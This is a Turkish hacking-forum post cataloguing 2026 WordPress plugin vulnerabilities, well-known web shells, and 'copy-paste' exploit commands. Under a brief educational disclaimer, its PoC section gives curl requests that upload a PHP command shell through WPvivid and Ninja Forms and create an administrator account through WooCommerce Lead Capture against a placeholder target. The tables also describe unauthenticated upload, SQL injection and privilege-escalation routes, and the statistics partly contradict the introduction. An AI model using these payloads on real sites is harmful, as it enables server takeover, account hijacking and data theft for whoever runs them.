🐘 Wordpress 150+ Zaafiyet & Web Shell List 🔧 | Part #1 🔥

🐘 WORDPRESS 2026: 200+ GÜNCEL ZAFİYET VE WEB SHELL ARŞİVİ WordPress ekosistemi, sadece bir haftada 185 yeni güvenlik açığı keşfedildi, bunların 169’u için hala yama yok veya...

🐘 WORDPRESS 2026: 200+ GÜNCEL ZAFİYET VE WEB SHELL ARŞİVİ​


WordPress ekosistemi, sadece bir haftada 185 yeni güvenlik açığı keşfedildi, bunların 169’u için hala yama yok veya yeni yayınlandı. Aşağıda, son günlerde keşfedilen en kritik zafiyetleri ve kullanılan shell’leri kısa ve öz, arşiv tadında bulacaksınız.

⚠️ UYARI: Bu liste yalnızca eğitim ve yetkili güvenlik testleri içindir. Yetkisiz kullanım yasa dışıdır.

🔥 KRİTİK ZAFİYETLER (CVSS 8.0+)​

Kimlik Doğrulamasız RCE / Shell Upload (En Tehlikelileri)​



CVE ID / ReferansEklenti / TemaZafiyet TürüVersiyonlarİstismar
CVE-2026-1357WPvivid Backup & MigrationKimlik Doğrulamasız RCE<= 0.9.123wpvivid_action=send_to_site ile doğrudan PHP shell yükleme ve çalıştırma
CVE-2026-0740Ninja Forms – File UploadsKimlik Doğrulamasız Arbitrary File Upload<= 3.3.26Dosya tipi kontrolü ve yetki kontrolü yok, direkt shell yükleme
CVE-2026-1555WebStack ThemeKimlik Doğrulamasız Arbitrary File Upload<= 1.2024img_upload AJAX işleyicisi üzerinden keyfi dosya yükleme → RCE
CVE-2026-27540WooCommerce Wholesale Lead CaptureKimlik Doğrulamasız Arbitrary File UploadTüm versiyonlarwwlc_file_upload_handler AJAX, hiçbir yetki kontrolü olmadan çalışır
CVE-2026-3584Kali FormsKimlik Doğrulamasız RCE<= 2.4.9Doğrudan uzaktan kod çalıştırma
CVE-2026-1405Slider FutureKimlik Doğrulamasız Arbitrary File UploadTüm versiyonlarKısıtlama olmadan keyfi dosya yükleme → tam sistem ele geçirme
CVE-2026-6518CMP – Coming Soon & MaintenanceKimlik Doğrulamasız Arbitrary File Upload<= 4.1.16cmp_theme_update_install AJAX ile uzaktan ZIP indirip çıkartarak RCE
CVE-2026-5718Drag and Drop Multiple File Upload for CF7Kimlik Doğrulamasız Arbitrary File Upload<= 1.3.9.6PHP dosyalarının yüklenmesine izin verir → RCE

Kimlik Doğrulamalı RCE / Yetki Yükseltme​



CVE ID / ReferansEklenti / TemaZafiyet TürüVersiyonlarİstismar
CVE-2026-27542WooCommerce Wholesale Lead CaptureKimlik Doğrulamasız Yetki YükseltmeTüm versiyonlarAJAX işleyicisi, kullanıcı kaydı sırasında admin rolü atamaya izin verir
CVE-2026-1756WP FOFT LoaderKimlik Doğrulamalı RCE<= 2.9.9Author seviyesindeki bir kullanıcı bile PHP shell yükleyebilir
CVE-2026-25366Woody ad snippetsKimlik Doğrulamalı RCE<= 2.7.1Kod enjeksiyonu ile uzaktan kod çalıştırma
CVE-2026-0726Nexter ExtensionKimlik Doğrulamasız PHP Object InjectionTüm versiyonlarKimlik doğrulama gerektirmeyen PHP object injection → POP chain varsa RCE
CVE-2026-3596Riaxe Product CustomizerKimlik Doğrulamasız Yetki Yükseltme<= 2.1.2AJAX eylemi yetki kontrolü yapmaz

SQL Enjeksiyonları (Veritabanı Dökümü)​



CVE ID / ReferansEklentiZafiyet TürüVersiyonlarİstismar
CVE-2026-6080Tutor LMSSQL Injection<= 3.9.8date parametresinde yetersiz kaçış
GHSA-Q4M3-X4H7-C3C2DirectoryPressSQL Injection<= 3.6.26packages parametresinde SQL enjeksiyonu
CVE-2026-3773Accessibility SuiteSQL Injection<= 4.20scan_id parametresi ile kimlik doğrulamalı SQLi
CVE-2026-3222WP MapsBlind SQL Injection<= 4.9.1location_id parametresinde time-based blind SQLi
CVE-2026-5207LifterLMSSQL Injection<= 9.2.1order parametresinde SQL enjeksiyonu

Cross-Site Scripting (XSS) – Depolanmış / Kalıcı​



CVE ID / ReferansEklenti / TemaZafiyet TürüVersiyonlarİstismar
CVE-2026-2602TwentigStored XSS<= 1.9.7featuredImageSizeWidth parametresinde yetersiz temizleme
CVE-2025-13364WP MapsStored XSS<= 4.8.7put_wpgm kısa kodunda XSS
CVE-2026-1398Change WP URLCSRF (XSS)<= 1.0CSRF ile yetkisiz işlem
Accessibly PluginAccessiblyStored XSS<= 3.0.3REST API uç noktaları yetki kontrolü yapmaz, kitlesel XSS
GHSA-4MCF-JJ9C-GVP6PrismaticStored XSS<= 3.7.3prismatic_encoded kısa kodunda XSS

Path Traversal / Arbitrary File Read​



CVE ID / ReferansEklenti / TemaZafiyet TürüVersiyonlarİstismar
GHSA-J54C-RR2X-FF86Drag and Drop Multiple File Upload for CF7Path Traversal → Arbitrary File Read<= 1.3.9.6Kimlik doğrulamasız herhangi bir dosyayı okuma
CVE-2026-4373JetFormBuilderPath Traversal → Arbitrary File Read<= 3.5.6.2Kullanıcıdan gelen dosya yollarını doğrulamaz

Tedarik Zinciri Saldırısı (Supply Chain Attack)​



ReferansEklentiAçıklama
Smart SliderSmart Slider 37 Nisan 2026’da eklentinin güncelleme sistemi ele geçirildi. Sürüm 3.5.1.35, sofistike bir uzaktan erişim aracı (RAT) içeriyordu. Güncelleme yapan her site otomatik olarak tehlikeye girdi

🐚 WEB SHELL LİSTESİ (2026)​

Aşağıdaki shell’ler, 2026’da saldırganlar tarafından en çok kullanılan veya yeni keşfedilen arka kapılardır.


Shell AdıTürÖzellikler / Tespit İpucu
EncystPHPPHP Web ShellFreePBX (CVE-2025-64328) üzerinden yayılıyor. Uzaktan komut çalıştırma, kalıcılık mekanizmaları ve başka shell’ler dağıtma yeteneği var. INJ3CTOR3 grubu tarafından kullanılıyor
Janus Varyantları: konzz & jfmPHP Web Shell (WordPress eklentisi kılığında)WordPress hedefli. Kodlarını gizlemek için hexadecimal (\144\151\163\160\154\141\x79) ve octal string’ler kullanıyor. eval veya system gibi anahtar kelimelerden kaçıyor
Turkshell.phpPHP Web ShellSANS ISC tarafından gözlemlendi. Varsayılan kurulumda /turkshell.php yoluyla erişiliyor. Önceden tanımlanmış arka kapı kimlik bilgileri içerebilir
Cookie-Controlled PHP Web ShellPHP Web ShellHTTP çerezlerini (cookies) komut kontrol kanalı olarak kullanıyor. Microsoft Defender araştırma ekibi tarafından keşfedildi. Linux sunucularda Cron job ile kalıcılık sağlıyor
Monstra CMS 3.0.4 ShellPHP ShellCSRF ile admin arayüzü üzerinden shell yükleme zafiyeti
Turkish Hack Shell (Jsp)JSP ShellTürk hacker gruplarının kullandığı klasik shell. Base64 ile şifrelenmiş komutlar çalıştırır
WSO (Web Shell by oRb)PHP ShellEfsanevi WSO shell. Dosya yöneticisi, komut çalıştırma, SQL sorgulama
C99 (r57)PHP ShellÇok eski ama hala tespit edilen shell’lerden. Klasik komut yürütme, dosya yükleme
b374kPHP ShellWeb tabanlı dosya yöneticisi, kod editörü, veritabanı yöneticisi
p0wny-shellPHP ShellTek dosyalı, hafif, hızlı; sadece komut çalıştırır
ShellbotPHP ShellC2 sunucusu ile haberleşen, komut alan gelişmiş bir web shell
Weird (W4SP)PythonW4SP Stealer ile bağlantılı; kurbanın token’larını ve şifrelerini toplar

🔧 EN HIZLI EXPLOİT POC’LAR (Kopyala-Yapıştır)​

CVE-2026-1357 (WPvivid Backup & Migration – Unauthenticated RCE)​

bash
curl -X POST https://hedef.com/wp-admin/admin-ajax.php \
-d "action=wpvivid_send_to_site" \
-d "file_path=../../../wp-content/uploads/shell.php" \
-d "file_content=<?php system($_GET['cmd']); ?>"

CVE-2026-0740 (Ninja Forms File Upload – Unauthenticated Shell Upload)​

bash
curl -F "[email protected]" https://hedef.com/?nf_fu_upload=1

CVE-2026-27542 (WooCommerce Lead Capture – Unauthenticated Admin Ekleme)​

bash
curl -X POST https://hedef.com/wp-admin/admin-ajax.php \
-d "action=wwlc_create_user" \
-d "username=hacker" \
-d "email=[email protected]" \
-d "password=Pass123" \
-d "wp_capabilities[administrator]=1"

📊 ÖZET İSTATİSTİKLER (2026)​


MetrikDeğer
Son 1 haftada keşfedilen toplam zafiyet185 (161 eklenti, 24 tema)
Yamalı / Yama bekleyen169 eklenti için yama mevcut, 16 eklenti hala açık
En yaygın zafiyet türüCross-Site Scripting (XSS) ve SQL Injection
En tehlikeli tür (RCE / Shell Upload)15+ kritik zafiyet
Aktif kötücül eklenti kampanyalarıJanus (konzz, jfm) ve Smart Slider Supply Chain

@Tc4dy | github.com/tc4dy
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
133,000Konular
3,284,537Mesajlar
318,282Kullanıcılar
KuduuSon Üye
Üst Alt